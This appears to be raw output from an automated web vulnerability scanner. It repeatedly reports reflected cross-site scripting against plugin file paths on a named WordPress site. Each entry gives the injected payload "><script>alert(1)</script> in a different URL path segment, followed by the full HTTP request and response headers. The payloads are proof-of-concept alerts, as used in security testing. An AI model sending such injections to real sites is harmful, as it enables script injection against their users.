HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:06 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ed6"><script>alert(1)</script>4a164db4c66 was submitted in the REST URL parameter 6. This input was echoed as b0ed6\"><script>alert(1)</script>4a164db4c66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.jsb0ed6"><script>alert(1)</script>4a164db4c66 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46a7"><script>alert(1)</script>c8efbec0fa1 was submitted in the REST URL parameter 1. This input was echoed as e46a7\"><script>alert(1)</script>c8efbec0fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitee46a7"><script>alert(1)</script>c8efbec0fa1/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:58 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e52"><script>alert(1)</script>c7eda42390 was submitted in the REST URL parameter 2. This input was echoed as d2e52\"><script>alert(1)</script>c7eda42390 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentd2e52"><script>alert(1)</script>c7eda42390/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65a5f"><script>alert(1)</script>825999123a4 was submitted in the REST URL parameter 3. This input was echoed as 65a5f\"><script>alert(1)</script>825999123a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins65a5f"><script>alert(1)</script>825999123a4/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9979"><script>alert(1)</script>228c627681f was submitted in the REST URL parameter 4. This input was echoed as a9979\"><script>alert(1)</script>228c627681f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincata9979"><script>alert(1)</script>228c627681f/js/mootools-1.2.3.1-more.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:03 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 928f1"><script>alert(1)</script>1c33f9cbad5 was submitted in the REST URL parameter 5. This input was echoed as 928f1\"><script>alert(1)</script>1c33f9cbad5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js928f1"><script>alert(1)</script>1c33f9cbad5/mootools-1.2.3.1-more.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aba1"><script>alert(1)</script>0cbb2f96b6 was submitted in the REST URL parameter 6. This input was echoed as 3aba1\"><script>alert(1)</script>0cbb2f96b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js3aba1"><script>alert(1)</script>0cbb2f96b6 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:06 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f91c"><script>alert(1)</script>89e1dc2587 was submitted in the REST URL parameter 1. This input was echoed as 6f91c\"><script>alert(1)</script>89e1dc2587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site6f91c"><script>alert(1)</script>89e1dc2587/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:54 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246ce"><script>alert(1)</script>c071be92443 was submitted in the REST URL parameter 2. This input was echoed as 246ce\"><script>alert(1)</script>c071be92443 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content246ce"><script>alert(1)</script>c071be92443/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:58 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34091"><script>alert(1)</script>09174c8f3b0 was submitted in the REST URL parameter 3. This input was echoed as 34091\"><script>alert(1)</script>09174c8f3b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins34091"><script>alert(1)</script>09174c8f3b0/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:00 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da63"><script>alert(1)</script>ef4ebc3ad8b was submitted in the REST URL parameter 4. This input was echoed as 7da63\"><script>alert(1)</script>ef4ebc3ad8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat7da63"><script>alert(1)</script>ef4ebc3ad8b/js/slideBox-v1.0.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a778"><script>alert(1)</script>914349c7fa1 was submitted in the REST URL parameter 5. This input was echoed as 3a778\"><script>alert(1)</script>914349c7fa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js3a778"><script>alert(1)</script>914349c7fa1/slideBox-v1.0.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1dfd"><script>alert(1)</script>f981ff2d39 was submitted in the REST URL parameter 6. This input was echoed as e1dfd\"><script>alert(1)</script>f981ff2d39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.jse1dfd"><script>alert(1)</script>f981ff2d39 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acc0"><script>alert(1)</script>5fc51608de0 was submitted in the REST URL parameter 1. This input was echoed as 3acc0\"><script>alert(1)</script>5fc51608de0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site3acc0"><script>alert(1)</script>5fc51608de0/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53477
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
